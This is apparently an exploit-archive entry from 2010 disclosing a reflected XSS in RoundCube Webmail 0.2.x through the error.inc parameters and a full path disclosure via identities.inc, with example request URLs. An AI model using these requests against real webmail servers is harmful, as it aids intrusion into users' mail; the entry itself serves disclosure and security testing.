[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RoundCube Webmail Multiple Vulerabilities
# Published : 2010-01-06
# Author : j4ck and Globus
# Previous Title : Joomla Component com_king Blind SQL Injection Vulnerability
# Next Title : SpawCMS Editor Shell Upload Vulnerability
# Exploit Title: RoundCube Webmail XSS Voulerability
# Date: 6.01.2010
# Author: j4ck & Globus from elitehackers.pl
# Software Link: Software link : http://roundcube.net/download
# Version: 0.2.X , | possible voulerability in higher versions.
# Tested on: *
# Code :
XSS:
http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123
We can get FPD or roundcube installation path via:
http://www.[somesite.com]/webmail/program/steps/settings/identities.inc